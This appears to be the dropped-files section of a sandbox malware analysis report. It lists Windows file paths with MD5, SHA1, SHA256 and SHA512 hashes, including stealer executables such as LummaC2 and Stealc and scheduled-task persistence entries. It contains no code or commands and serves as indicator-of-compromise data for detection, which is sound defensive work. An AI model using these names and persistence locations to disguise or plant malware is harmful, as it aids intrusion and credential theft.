SHA512 9767f2afbe92eddc46a5654f7f8d6eb10da305df5b009d7407ba9822e5d0f9cc374728900e5ebed15e9849f155a77f44d96f16b4bcca650a42257bdca7f29cbd

C:\Users\Admin\AppData\Local\Temp\emgUhHdp.exe

MD5 35c9bc696a96979cbcc57213d8fb8a51
SHA1 2acc26416bfcfaf2f7037c211f7dcd35d7a06ac1
SHA256 a99e6d312c944090d229e7198f05f1cf7a38e37f203646c8aa00c6d77c1359a5
SHA512 c620f408a3f1af9ff0ae20680c1e56d21634e6cfbc9e4dc3bd69b9868bf2c03516f620bcf5de9e8883bfd0f1795622df3f2e3bce643c4fd54ed20f69ce93c534

C:\Program Files (x86)\MountTaiSoftware\Lodop\CAOSOFT_WEB_PRINT_lodop.ocx

MD5 230c8f87850fd67b6b3024da50f360bb
SHA1 f3a629ece2b85aee9a88b3caebc54ac66053330a
SHA256 3b30b5a1a4561ce2ef9b7fd0f2aa97e533f35c2bdbdb534995cc44066ae0f90a
SHA512 5dfdedebe4a0e3843d68a3d93a44e54979f8a637902f499c278b5bb91c3a61561f3ed5de510c54405dd4f093128b9b69e175f6b63f9be2b000bbe381f6a2c3eb

C:\Users\Admin\Desktop\Files\LummaC2.exe

MD5 9b3eef2c222e08a30baefa06c4705ffc
SHA1 82847ce7892290e76be45b09aa309b27a9376e54
SHA256 8903d4bfe61ca3ca897af368619fe98a7d0ee81495df032b9380f00af41bbfc7
SHA512 5c72c37144b85b0a07077243ffe21907be315e90ba6c268fdb10597f1e3293e52a753dccbfd48578871a032898677c918fa71dc02d6861e05f98f5e718189b73

C:\Users\Admin\Desktop\Files\Sniffthem.exe

MD5 18ba97473a5ff4ecd0d25aee1ac36ddd
SHA1 9b9dad90f6dcd55c6d20857649ce5279c6a9b8d7
SHA256 feefce2d619431c33f6e7167eb467df24ee45b45a8b7c8f804cdf0aa1a04b732
SHA512 0601b17d4b715ba4def5811f94ceeecc62542a9ce53ccef548313e69499cf34f80c8c231d3dd56c71adb05bfcccede58e4d8f76838cd1b2095003bd804ab7c77

C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe

MD5 97eb7baa28471ec31e5373fcd7b8c880
SHA1 397efcd2fae0589e9e29fc2153ffb18a86a9b709
SHA256 9053b6bbaf941a840a7af09753889873e51f9b15507990979537b6c982d618cb
SHA512 323389357a9ffc5e96f5d6ef78ceb2ec5c62e4dcc1e868524b4188aff2497810ad16de84e498a3e49640ad0d58eadf2ba9c6ec24e512aa64d319331f003d7ced

C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe

MD5 4edcaedbf0e3ea4480e56d161f595e8c
SHA1 e46818f6e463d5c7d05e900470d4565c482ca8e2
SHA256 f3e87137e58e1f3878ed311b719fe1e4d539a91327a800baf9640543e13a8425
SHA512 3ab0c1d41a24cd7be17623acbdae3dd2f0d0fd7838e6cb41fe7427bca6a508157e783b3d8c9717faa18f6341431226719ee90fa5778626ce006f48871b565227

C:\Users\Admin\Desktop\Files\Installeraus.exe

MD5 749bd6bf56a6d0ad6a8a4e5712377555
SHA1 6e4ff640a527ed497505c402d1e7bdb26f3dd472
SHA256 e6148c7e8cec3a4565e97a139d2b09dbdf2f30460054fa168624fdc1050421d3
SHA512 250f1825f5d2577124606818a8c370bb862d74dfebddd8c25ec2b43448626b583e166e101f65ebe12b66b8767af7ad75a8d9f5a3afd4e10f4dd3e6239efe9a7d

C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D98BA7C4C88AEA74FEAE9B7A877829F5181B34E3

MD5 6d9557c4e7bf002381c55a864cb3ae90
SHA1 d6c87181074a784da8aeff193e2145904ecabdc9
SHA256 919d8c336ab31d6bd2d6f97ee091ea6c63e4d4e114371fe2c186a24c09078d83
SHA512 f0887b205ced2881dc662c1962bec986870acdf468ab4de5659949a1df4a35b73cc46a2e793b7865e69d59760a0330ceab0cd03445647643df5df68e93a183ae

C:\Users\Admin\Desktop\Files\scheduledllama.exe

MD5 46aa8f5fe3d5af96f0a970a8f4df625d
SHA1 0b4395edb19d330ad6dc285767b4f5a4a7a16c05
SHA256 b2a54962c45f5dbd7af447a5ab4cf8cea752f8c667d4dc504e1834da94ac4514
SHA512 e6b1ded614f634e68b17a1ecd4f75538703f0b8603913b2abd30d0d98331f84c3f2b38b8cfe19615d7e5bfe645837bee8a4f604f54bb95ac8c98c830ab7fe47f

C:\Users\Admin\Desktop\Files\DEF.exe

MD5 6520492a4e7f9bc4dfb068de1c7b6450
SHA1 b5c2086a01528386482826ad243c2711e04200fb
SHA256 94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa
SHA512 dd8d2d9a22ff521496a908f7dd5de7e25c4d7fd0a56d917a0ba29a5d160a293890f5c397e1ae7bb8a7488d4795221f819d810826b5d533ad1d61e63c438b2565

C:\Users\Admin\AppData\Local\Temp\YpnA358o.exe

MD5 76c4a898a39a60bd25a44c0331c59d8c
SHA1 9c880760278b94057cf0695d9d1a1fb38477d2b2
SHA256 6391a145a77cbfcdc9828825aedc6d98725580a160d757e36939cb3399d8390e
SHA512 16a74a4b1149b91c2b4377c7ba26562cd98f0b019282de978161f28fa956e80c5776904811d9dc798d8a088a34678af823518cc270eaaab436d3c14855814d9b

C:\Users\Admin\Desktop\Files\octus.exe

MD5 c3927a5d6de0e669f49d3d0477abd174
SHA1 40e21ae54cb5bbb04f5130ff0c59d3864b082763
SHA256 f430f588aad57246c8b1cd536bc9ae050a4868b05c5dfaa9b5c555f4593a4b33
SHA512 20fe73aa1e20270f8040e46a19413d5af8cb47efcf8caef4075e2824268cdca8d775264c9c75a734c94c28c51983ebd27695dcad1f353ec338bd12e368aaa04d

C:\Windows\System32\Tasks\axplong

MD5 7384e797a6d2369e4bc36d05df9eee25
SHA1 c3729ed830c8a68315dacaff8bddb1ce1f8775fe
SHA256 8ddb5a622431e3a7c1671d705c20aaa3dd04e7c4c51aad714f5990f708828132
SHA512 3397203cb83e509289813bbb6942ee8e53ac65169c679c6c19a1d44d4ca18ac97ecb46d1f3c6763e30a5570dfeff398bb34d4909fea46fe9f4debe6fb3eb15d7

C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

MD5 68a99cf42959dc6406af26e91d39f523
SHA1 f11db933a83400136dc992820f485e0b73f1b933
SHA256 c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3
SHA512 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe

MD5 34a152eb5d1d3e63dafef23579042933
SHA1 9e1c23718d5b30c13d0cec51ba3484ddc32a3184
SHA256 42365467efe5746a0b0076a3e609219a9cffe827d5a95f4e10221f081a3bf8fa
SHA512 270298ca39c3ff0ab4c576374a5c091135efad3c1cb9930888a74ef7d421f43039c2545eadecb037fcff2b8ee4e22cd4d809b19e7958b44ba1c72100135a46fe

C:\Users\Admin\AppData\Local\Temp\1002824001\9f346cc402.exe

MD5 6a3268db51b26c41418351e516bc33a6
SHA1 57a12903fff8cd7ea5aa3a2d2308c910ac455428
SHA256 eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c
SHA512 43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33

C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe

MD5 c07e06e76de584bcddd59073a4161dbb
SHA1 08954ac6f6cf51fd5d9d034060a9ae25a8448971
SHA256 cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9
SHA512 e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

C:\Windows\System32\Tasks\Gxtuum

MD5 267ea52710bf7b967429c3f0df8092c5
SHA1 8274293c7e1a858f1c512bb0980112c0c1eb7473
SHA256 22d4d275c3b7a5f4006e88c1bacf97a70f537f8fc9157e1c1c77564721b5bea4
SHA512 284dac772e1d6e9276b514b88b57ae30cababfbe96fdefcf041661493e2d8356de3d2211c5b4650c9fc2d491cac38830df231e47918258593ef6c0b65a170954

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe

MD5 b3834900eea7e3c2bae3ab65bb78664a
SHA1 cf5665241bc0ea70d7856ea75b812619cb31fb94
SHA256 cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce
SHA512 ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909

C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe

MD5 aed024049f525c8ae6671ebdd7001c30
SHA1 fadd86e0ce140dc18f33193564d0355b02ee9b05
SHA256 9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494
SHA512 ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2

C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe

MD5 7b5e89271f2f7e9a42d00cd1f1283d0f
SHA1 8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f
SHA256 fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a
SHA512 3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22

C:\Users\Admin\AppData\Local\Temp\1004437001\d36f264390.exe

MD5 17d580563cbdd3a37f8ef159c70f0b8e
SHA1 b0532976bd695b39384aa81d89b54fbde900b778
SHA256 9bba12864f0e8b64600e4252b589fd4f1f0b0339ecde4bc1c130a0d96945ffa7
SHA512 784fff522205ce44534474cdb26c7b456aeb6e2c42e4de96b3d5f6b4a36a0d329cf05a847f0a292979aaa09935fc9445390063faca4f0f492ee61ade0540f775

C:\Users\Admin\AppData\Local\Temp\1004438001\d30e0af131.exe

MD5 95a269acc2667e85ec3c67f5f76e0fe5
SHA1 85b4c01a1f5a65cfe084165bbba00493a74b6a1a
SHA256 d8bf15f010a88817bfff05c7df61fba23676d5fe4d3a8deb5073fc7fa5255a3c
SHA512 be24721f2eec1b3240837a1d42030d58de00cbcd66d6db183a11d3f00e2829859b4813b1a6bcdffcba0c7352975618df95212e723d0bb65a0c360dd8fd1a20dd

C:\Users\Admin\AppData\Local\Temp\is-G3R38.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Roaming\Isk1MjbS0E.exe

MD5 fd381b2627904d8365229d1ddd7e221f
SHA1 d7bcbabb6cd84875cc76f8170833ac679cd7d915
SHA256 ed5ac0c0d07595eb99ccc7346faab8504eb03000da1012abc1009c0cfbd4d4b9
SHA512 2b1e15b539d55b92f31c61cff954dafa61a44f7ccf75d113ab57ad54e9a8cbde304a285d0583663a206f648fd4f3b63257dbedf3df608d0391353ffb4aa78daf

C:\Users\Admin\AppData\Roaming\W70OVXGD7k.exe

MD5 131d164783db3608e4b2e97428e17028
SHA1 c00064a0f4952f5a37093cd7631f5921f9c00387
SHA256 05053f2a6db0f5352295ce4ca7146618ddb175f1ff4cdcd93a055a039c098e5f
SHA512 020b22527d0e555509897ce2df876bf2a30e3fc976cd86e52335104cf0f9db152caa8b46650a8bd0022b3cbaf3d20e0201322e3617e00eb0f25c6fcba245c505